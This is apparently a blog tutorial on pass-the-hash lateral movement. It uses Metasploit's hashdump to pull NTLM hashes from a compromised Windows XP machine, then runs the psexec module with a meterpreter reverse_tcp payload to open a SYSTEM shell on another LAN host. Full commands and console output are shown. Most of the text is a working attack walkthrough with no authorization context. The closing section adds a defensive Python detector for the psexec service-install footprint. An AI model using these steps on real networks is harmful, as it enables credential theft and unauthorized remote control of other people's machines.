Pass The Hash

By: Multi Thinker

July 14, 2015

Hi once again,

Using this method, all we need is the user name from a fully compromised PC on the SMB (LAN) network, which we have from the Windows XP SP2 box we recently exploited. Now that we know that user name, we need to move through the LAN to the other PCs.

Let's begin...

I assume you have the Metasploit console open and have already configured our target there, so let us start from Meterpreter. I will write out the full terminal commands, since you know the basics.

We're going to use "post/windows/gather/hashdump". You can locate it by searching for it in the terminal. We recently had access to CMD, and we could even read the system login information file (known as SAM) directly. The hash will be in NTLM format, which is easy to crack. But for our purpose we need to pass the hash directly, so we use hashdump in the terminal.

meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::

Now that we have the hash, let's use the `psexec` exploit to pass it. Open one more terminal in a new instance and start the msf console there. We know we need `psexec`, but we don't know its full path, so let's search for it.

msf > search psexec

Exploits
========

   Name                       Description
   ----                       -----------
   windows/smb/psexec         Microsoft Windows Authenticated User Code Execution
   windows/smb/smb_relay      Microsoft Windows SMB Relay Code Execution

YES! We got it. Now, let's use it.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST xx.xx.xx.xx
LHOST => xx.xx.xx.xx
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST xx.xx.xx.xx
RHOST => xx.xx.xx.xx
msf exploit(psexec) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    xx.xx.xx.xx      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPass                   no        The password for the specified username
   SMBUser  Administrator    yes       The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST     xx.xx.xx.xx      yes       The local address
   LPORT     443              yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Set the SMBPass:

msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) > exploit

[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'Administrator'...
[*] Uploading payload...
[*] Created KoVCxCjx.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xx.xx.xx.xx[svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:xx.xx.xx.xx[svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (XKqtKinn - "MSSeYtOQydnRPWl")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting KoVCxCjx.exe...
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (xx.xx.xx.xx:443 -> xx.xx.xx.xx:1045)

Yeah! We got it.

meterpreter > shell
Process 3680 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

Voila! One more down. Now we have full access to it.

-- Multi Thinker
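The psexec session above leaves a visible footprint on the target: a randomly named service is installed, started and removed, and its binary is dropped into and deleted from the ADMIN$ share. The following is an added detection example, not code from the original post; it checks constructed Event ID 7045 ("A service was installed in the system") records for that pattern, and assumes a simplified key=value rendering of the event's fields plus the default ADMIN$ paths.

```python
# Added detection example (not from the original post): flag Event ID 7045
# "A service was installed in the system" records matching the footprint of
# the psexec session above: a randomly named service whose binary sits
# directly in the ADMIN$ share root, installed to run as LocalSystem.
VOWELS = set("aeiouAEIOU")
ADMIN_SHARE_ROOTS = {"%systemroot%", "c:\\windows"}  # assumed default paths

# Constructed sample records (key=value pairs joined by '|'). The first reuses
# the service and file names printed by the session above; the others imitate
# legitimate Windows services.
SAMPLE_7045 = [
    "ServiceName=XKqtKinn|ImagePath=%SystemRoot%\\KoVCxCjx.exe"
    "|StartType=demand start|Account=LocalSystem",
    "ServiceName=TrustedInstaller"
    "|ImagePath=%SystemRoot%\\servicing\\TrustedInstaller.exe"
    "|StartType=demand start|Account=localSystem",
    "ServiceName=WinDefend"
    "|ImagePath=\"%ProgramFiles%\\Windows Defender\\MsMpEng.exe\""
    "|StartType=auto start|Account=LocalSystem",
]

def parse_7045(line: str) -> dict:
    """Split one constructed record into a field dictionary."""
    return dict(kv.split("=", 1) for kv in line.split("|"))

def looks_random(name: str) -> bool:
    """Machine-generated names are letters only and either flip case often
    or have almost no vowels; real service names read as words."""
    if len(name) < 6 or not name.isalpha():
        return False
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    vowel_ratio = sum(c in VOWELS for c in name) / len(name)
    return flips / (len(name) - 1) >= 0.4 or vowel_ratio <= 0.15

def detect_psexec_like(records) -> list:
    """Return the service names whose install record matches every indicator."""
    hits = []
    for line in records:
        ev = parse_7045(line)
        parts = ev.get("ImagePath", "").strip('"').split("\\")
        in_share_root = "\\".join(parts[:-1]).lower() in ADMIN_SHARE_ROOTS
        binary_stem = parts[-1].rsplit(".", 1)[0]
        if (in_share_root and looks_random(ev.get("ServiceName", ""))
                and looks_random(binary_stem)
                and ev.get("Account", "").lower() == "localsystem"):
            hits.append(ev["ServiceName"])
    return hits
```

Requiring all four indicators together keeps names like MsMpEng, which the case-flip heuristic alone would flag, from producing alerts. Correlating a hit with a preceding network logon (Security Event 4624, logon type 3, NTLM) from the same source host strengthens it further.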